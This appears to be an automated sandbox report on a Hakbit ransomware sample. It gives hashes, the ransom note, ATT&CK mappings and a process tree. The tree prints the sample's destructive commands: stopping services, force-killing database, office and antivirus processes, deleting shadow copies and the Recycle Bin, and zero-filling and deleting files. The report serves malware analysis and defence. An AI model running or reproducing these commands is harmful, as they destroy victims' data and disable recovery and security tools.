hakbit | 1423053f90855d33858db47f354055b660943104c1c18f848c9b7b415979dc5f

max time kernel
0s
max time network
54s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 18:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4
SSDEEP

1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0

Score

10^/10

hakbit evasion execution ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below [email protected] Key Identifier: RVnmS1bWetvIffriR2qtZs5g5gDAuQSfLolpqGdZ33vWb0ovAi8Nxy4FqoIv0Pq3nbL/Cb9p/SU4Lklc/VrvYBhY07Ty8KIWGQzC32gWUdUWrcSK0K3oaMOIHbpR9fjzQM2QfPMUxF4KAG4Cc2QILm9V9grMctqvrn71jANfIGVQZJHUhIbdchffMFa0mBd1wSLCF6crSbHHcEYU0TeCrvjaLeY3L7zuXBwzp3P6WLsyQEsMvIuSfZLNYauONuUbgpOcVuWdZGNULADFbdYQShVw8iI+LtkJSzPH2TvcFjldPyBJoDHD1h06Rrjd/XNumYIR4HSZcbZtl864e7/9E72ZIRdV5qzlmqndKklmpc+xlWV+7yz5LMOb2YM4bZg0Z3RMpag0t8Dcj/aalaskHoHaX41QfcFHdsdAaeLl0krNQHZgqlZnqFkDCbhxVK+m9C99eWI5nkBDtY+rZ5fn5iHclRMjORrhuTNsl9snWUQbk9oCg7ju2XiAT5q+tSD3+UH7IR++CeEqU1OiA0u+mqXQJYadlrVkVdI8amIlxtY6It7o6KZn6cOCbG25hMa6YxLOoveh7XST4JHXjRdbeMS799JCWM78smPKdZ2UwkVDoa3sD5TlETKU55LTmtgto567m9MAQtXnwOi7k4ywGrKxZx5AhW9bjtdsLp82emU= Number of files that were processed is: 410

Emails

[email protected]

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4436	sc.exe
3684	sc.exe
3548	sc.exe
3608	sc.exe

Kills process with taskkill 47 IoCs

evasion

pid	Process
4264	taskkill.exe
1392	taskkill.exe
1428	taskkill.exe
4208	taskkill.exe
1624	taskkill.exe
396	taskkill.exe
1372	taskkill.exe
4980	taskkill.exe
4396	taskkill.exe
736	taskkill.exe
4500	taskkill.exe
4908	taskkill.exe
648	taskkill.exe
3948	taskkill.exe
4816	taskkill.exe
3108	taskkill.exe
3844	taskkill.exe
5108	taskkill.exe
3444	taskkill.exe
2852	taskkill.exe
4700	taskkill.exe
4284	taskkill.exe
4916	taskkill.exe
4528	taskkill.exe
4364	taskkill.exe
2772	taskkill.exe
4072	taskkill.exe
4568	taskkill.exe
4632	taskkill.exe
1760	taskkill.exe
1044	taskkill.exe
116	taskkill.exe
1540	taskkill.exe
2320	taskkill.exe
4800	taskkill.exe
936	taskkill.exe
1288	taskkill.exe
2672	taskkill.exe
988	taskkill.exe
3616	taskkill.exe
4420	taskkill.exe
1200	taskkill.exe
4388	taskkill.exe
3232	taskkill.exe
4868	taskkill.exe
2784	taskkill.exe
2880	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2104	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2128	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 4140 wrote to memory of 3608	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	80
PID 4140 wrote to memory of 3608	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	80
PID 4140 wrote to memory of 3548	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	81
PID 4140 wrote to memory of 3548	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	81
PID 4140 wrote to memory of 3684	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	82
PID 4140 wrote to memory of 3684	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	82
PID 4140 wrote to memory of 1496	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	85
PID 4140 wrote to memory of 1496	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	85
PID 4140 wrote to memory of 4436	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	88
PID 4140 wrote to memory of 4436	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	88
PID 4140 wrote to memory of 4388	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	90
PID 4140 wrote to memory of 4388	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	90
PID 4140 wrote to memory of 1200	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	91
PID 4140 wrote to memory of 1200	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	91
PID 4140 wrote to memory of 1392	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	92
PID 4140 wrote to memory of 1392	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	92
PID 4140 wrote to memory of 2772	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 4140 wrote to memory of 2772	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 4140 wrote to memory of 4364	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	94
PID 4140 wrote to memory of 4364	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	94
PID 4140 wrote to memory of 1540	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	95
PID 4140 wrote to memory of 1540	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	95
PID 4140 wrote to memory of 988	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	96
PID 4140 wrote to memory of 988	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	96
PID 4140 wrote to memory of 2852	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	97
PID 4140 wrote to memory of 2852	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	97
PID 4140 wrote to memory of 4568	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	98
PID 4140 wrote to memory of 4568	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	98
PID 4140 wrote to memory of 4816	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	99
PID 4140 wrote to memory of 4816	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	99
PID 4140 wrote to memory of 736	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	100
PID 4140 wrote to memory of 736	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	100
PID 4140 wrote to memory of 4500	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	101
PID 4140 wrote to memory of 4500	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	101
PID 4140 wrote to memory of 4396	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	105
PID 4140 wrote to memory of 4396	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	105
PID 4140 wrote to memory of 4980	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	106
PID 4140 wrote to memory of 4980	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	106
PID 4140 wrote to memory of 1428	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	107
PID 4140 wrote to memory of 1428	4140	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	107

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4140
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:3608
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:3548
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:3684
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:1496
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:4436
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:4388
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:1200
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:1392
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:2772
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4364
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1540
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:988
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:2852
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:4568
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:4816
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:736
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:4500
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:4396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:4980
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:1428
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:3444
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:1288
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:4072
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:4420
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:936
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:3616
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:5108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:3844
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:1372
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:4800
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:4528
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:4916
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:2880
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:116
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:4632
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:1044
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:4700
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:4264
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:1760
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:3108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:3948
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:2672
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:2784
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:2320
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:4868
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:648
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:3232
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:4908
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:1624
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:4284
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:4208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:4368
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2104
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5788
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:2128
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:2600
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
  2⤵
  PID:1316
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

Filesize
1.3MB

MD5
6255ca744d7f9e9131c6244c52df2200

SHA1
a57557d07bb4ab896e1fa8b1d79684577c59e9ab

SHA256
20e2af82653c819763f8f2ea44c8ac8893f85c2950b400023ee49b57886656ba

SHA512
ec397576f011eb28b537ea2d27f8ff86b6518b4eb61cb395a4a2a18348708e325120938f97aeb23d5df7c97dffaa06298d3b9d5f6314e0fa82afbdb0ac2ca33e

Download Submit
C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi

Filesize
8.4MB

MD5
de045572909c888749fd0ac14a2e1758

SHA1
19d7b7a96fc9b202d2d996e5e240ec14df86d9f2

SHA256
8708751f4781dca25a8227ff7fb350a524253f6699ad1961a5ca0aef53ec6e3b

SHA512
a7fed9926c4097cbace3653b60d22d3ca235fa9dbc6ce2df15bb62c470b8445bce3eff9903d5d9781ef2207b98830f4df1acf5f71627527a96e2e3ab337703da

Download Submit
C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.energy[[email protected]]

Filesize
728KB

MD5
718b421ff16796fd6363dd85c48231b0

SHA1
6467a6307381f80df96b989099afcb38f8e7bf2e

SHA256
bada8b552cdb2e44bd1aa69606ca35224949ed7080f65caaae269b9997494e2f

SHA512
e78979816c5a376bdd8639db44fc1a3370432fe51f05c27c1a67cceb5598139a205d0241746485cc15a3b6e4f61e7e28c3d8b6c9451a7186b9a52a4a37658a41

Download Submit
C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi

Filesize
7.6MB

MD5
bfd8b346decb6c77e119cb9cbf97920c

SHA1
cf78da61bb96469d753749dc56183366c9b00d3d

SHA256
8b0e790c728b62261dee015b71bdfb3383fdbff423abb8bf6a3dc02685886eff

SHA512
1bcaa5348a1d7853d29bafe832e0bebcd82238b447146b6e0f4d9223efc254d939decbdde56a55f7ffc17744c3bb67108992a1eddd2541be21f2b6438a101ebd

Download Submit
C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]

Filesize
180KB

MD5
8ac867f52a2a3cb8bf8d0abd95e96a88

SHA1
36953995d5e3b84805edbe01093fa4a0cddaca1a

SHA256
529535eada2171093a951dd1dcfb9673c493cc47eebecaf35b1f8ad4697d71a1

SHA512
386d38f0e7a0a8282ca1dd7f5cafe8f8913c02d347723032a917c486d6520f0fec267a741f0cd508c9971d2e2b1ce43257c76fe92d02dc96fd2cf717bbfad067

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_maj1tkq3.cts.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Filesize
828B

MD5
26dea50bd6c5ded7fa9ff438a736b70e

SHA1
f9ab29290d058c0e71f0856f54cf807446beef30

SHA256
ec0cbd3ddabe7aa42b57d674752fbd5f949f59e71ff057dbad371672225726f7

SHA512
